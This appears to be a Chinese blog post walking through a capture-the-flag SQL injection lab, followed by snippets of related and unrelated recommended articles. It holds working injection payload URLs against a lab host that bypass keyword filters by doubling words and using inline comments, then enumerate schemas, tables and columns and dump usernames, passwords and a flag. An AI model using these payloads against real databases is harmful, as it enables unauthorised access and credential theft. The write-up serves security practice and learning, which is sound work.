SQL注入靶场演练

最新推荐文章于 2025-06-05 17:14:04 发布
最新推荐文章于 2025-06-05 17:14:04 发布
阅读量592 收藏 7
点赞数 6
文章标签: java linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Xinghaoyang666/article/details/143977630
版权


找闭合,用万能密码,发现过滤or,所以绕过admin’oORr‘1‘=’1

发现登陆成功

尝试用order by查询列数,又发现by过滤,所以绕过admin’/**/oorrder/**/bBYy/**/3查出列数是3

用联合查询,发现过滤http://139.196.211.199:8162/check.php?username=-admin%27unUNIOnion/**/seSELECTlect/**/1,2,3 %23&password=admin发现2和3是回显点

继续用联合查询查询库名,发现过滤

fromhttp://139.196.211.199:8139/check.php?username=-admin%27unUNIOnion/**/seSELECTlect/**/1,2,group_concat(schema_name)/**/ffromrom/**/infoorrmation_schema.schemata %23&password=admin结果显示:

查到库名,发现有geek库,果断继续查询表名(仍然注意过滤,发现where也被过滤)

http://139.196.211.199:8162/check.php?username=-

admin%27unUNIOnion/**/seSELECTlect/**/1,2,group_concat(table_name)/**/ffromrom/**/infoORrmation_schema.tables/**/whwhereere/**/table_schema=’geek’%23&password=admin

结果显示: 查字段

-admin%27/**/ununionion/**/seselectlect/**/1,2, group_concat(column_name)/**/frofromm/**/infoorrmation_schema.columns/**/whwhereere/**/table_name=%27ssql%27%23&password=admin

最后一步查表中数据

http://139.196.211.199:8162/check.php?username=-admin%27unUNIOnion/**/seSELECTlect/**/1,2,group_concat(‘id’,’username’,'passwoorrd')/**/ffromrom/**/ssql%23&password=admin(一开始尝试在geekuser里面查找flag,但查询时发现没有查想要的数据,所以将geekuser改为ssql后查到flag)

搂……住
关注
掌控安全学院SQL注入靶场
qaq517384的博客
11-18 3961
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
安全攻防——搭建sql注入靶场
future_1024的博客
01-15 1909
安全攻防——搭建sql注入靶场sql注入简介sql注入的类型与注入技术学习环境搭建(需要安装docker) sql注入简介 最近一段时间负责公司产品安全相关工作,便了解一些相关技术,sql注入就是其中著名又重要的一项。 在了解sql注入之前,以为sql注入只是简单的利用 1=1 这样类似的sql拼接来登录网站,当开始接触后才发现原来sql注入的种类有这么多。 sql注入的类型与注入技术 根据数据类型可以分为以下几种: 数字型注入 字符型注入 包括但不限于以下sql注入技术: Error based D
靶场实战——SQL注入
weixin_58666006的博客
07-25 646
id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -id=1 union select 1,database() LIMIT 1,1 -- -输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4431
一次简单的SQL注入靶场练习
sqli-labs SQL注入靶场通关手册(1-21)
2301_76594872的博客
07-02 1154
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
sql注入漏洞复现
yfy0308的博客
08-06 989
id=-1’ uninon select 1,2,3 第一件事,闭合单引号,摆脱单引号控制id=-1’是原因:有时网页往往只能一行数据,所以我们要让前面第一个select语句的返回值为空,才能让后面的第二个select语句回显出数据。2个办法,继续把多出来的单引号闭合或者注释mysql注释符:–空格(%20) # /***/ */ #会被浏览器编码,所以要写成%23你需要知道联合查询的列数,求当前表的列数(我们用注入获取数据库中的数据。在进行联合查询前,我们必须知道当前表的字段数。
SQL注入练习 --- Sqli-labs靶场
Zhuoqian_1的博客
03-11 372
这几天学习了一些基础的SQL注入,刷一刷Sqli-labs靶场来练习一下。 现在做了:0道 已完成: SQLi-LABS Page-1(Basic Challenges) Page-2 (Advanced Injections) Page-3 (Stacked Injections) Page-4 (Challenges)
DVWA靶场-sql注入sqlInjection)
zeroone的博客
03-10 6278
第七关:SQL Injection       SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 Low <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[
sql显错注入——靶场操作记录<掌控安全>
chick11的博客
09-28 2698
掌控安全学院SQL注入靶场 存在index.php? 前几节课讲过?一般为get传参! 当然界面上也说了 ————————————————开始尝试—————————————— 1.判断是否存在注入 当输入id=2时页面发生变化 再继续掌控安全学院SQL注入靶场 当加上条件and1=2时界面不显示(报错)基本确定存在注入 ————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常! 判断当前表中字段.
SQL注入测试靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
深入SQL注入靶场演练sqlilabs与常用工具解析
通过在sqlilabs靶场进行实际操作,用户可以了解攻击者如何利用SQL注入漏洞进行数据窃取、数据库结构探查等操作。 2. **课上靶场源码**: 在安全教学中,源码的理解对于学习安全漏洞的原理至关重要。这里提到的blog...
PAT-乙级JAVA题解(更新中...)
qq_49695680的博客
06-04 675
Java 中实现线程的创建和启动
2301_80215285的博客
06-04 1051
Java中,创建线程和启动线程是两个关键步骤。必须调用start()而非直接调用run(),因为start()会触发JVM创建新的调用栈并交由操作系统管理,实现真正的异步执行。直接调用run()仅会在当前线程同步执行方法。start()使线程进入可运行状态,符合线程生命周期规范,并能利用多核CPU实现并行计算。正确区分两者对多线程编程至关重要,只有通过start()才能发挥线程的并发优势。
优雅的系统重试
huangyujun9920123的博客
06-05 669
本文探讨了如何优雅实现方法重试机制。程序员A起初采用固定次数的循环重试方式,但发现多个接口存在重复代码。通过分析将重试框架与业务逻辑解耦,最终构建了可复用的重试策略类。该方案使用Supplier函数式接口接收业务逻辑,实现了:1) 统一的最大重试次数控制;2) 状态码判断;3) 异常处理。这种设计既消除了代码冗余,又通过lambda表达式灵活支持不同业务逻辑,为类似场景提供了可扩展的解决方案。
Java并发编程实战 Day 7:并发集合类详解
在未来等你的专栏
06-04 1206
并发集合类是指那些专门为多线程环境设计的集合类型,它们在保证线程安全的同时,尽可能地提升了性能。及其子类(将在后续章节讲解)相比传统的同步集合(如包装的集合),并发集合采用更细粒度的锁机制或无锁算法,从而减少线程间的竞争,提高并发性能。并发集合类的基本概念及常见实现。和的使用方法与底层原理。如何通过性能测试验证并发集合的优势。明天我们将进入进阶篇的第一天——Java内存模型深度解析,敬请期待!使用和解决线程安全问题。分析并发集合类的底层实现原理。在实际工作中根据业务场景选择合适的并发集合。
极限复习c++
最新发布
2302_76213070的博客
06-05 1417
快速过一遍必背代码(类、多态、模板)和简答题答案,强化肌肉记忆!祝考试顺利,代码全 AC!
《doubao-lite-32k 模型缓存机制使用指南》
lpfasd123的博客
06-05 1464
doubao-lite-32k模型的Session缓存机制专为多轮对话设计,支持最长32K Token的上下文存储。
javascript 原型链与继承机制的深度解析
爱分享的程序员
06-05 986
JavaScript的原型链与继承机制是其面向对象编程的核心。本文从四个维度深度解析:首先介绍原型概念,每个对象都有[[Prototype]]指向原型对象;其次讲解原型链工作原理,通过多层级继承示例说明属性查找过程;然后详细分析五种继承实现方式,包括原型链继承、构造函数继承、组合继承、寄生组合继承以及ES6的Class语法糖;最后通过流程图阐明构造函数与原型的关系,解释原型链查找规则和共享方法机制。文章结合代码示例与图示,系统性地展示了JavaScript继承体系的实现原理与应用场景。
mysql密码正确SpringBoot和Datagrip却连接不上
m0_73801775的博客
06-05 318
报错信息:SQLException: Access denied for user ‘root‘@‘localhost‘ (using password: YES)我这里是禅道端口与MySQL冲突,禅道端口也是3306,ctrl+alt+delete打开任务管理器,关闭mysqlzt。原因可能是是有端口号冲突。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值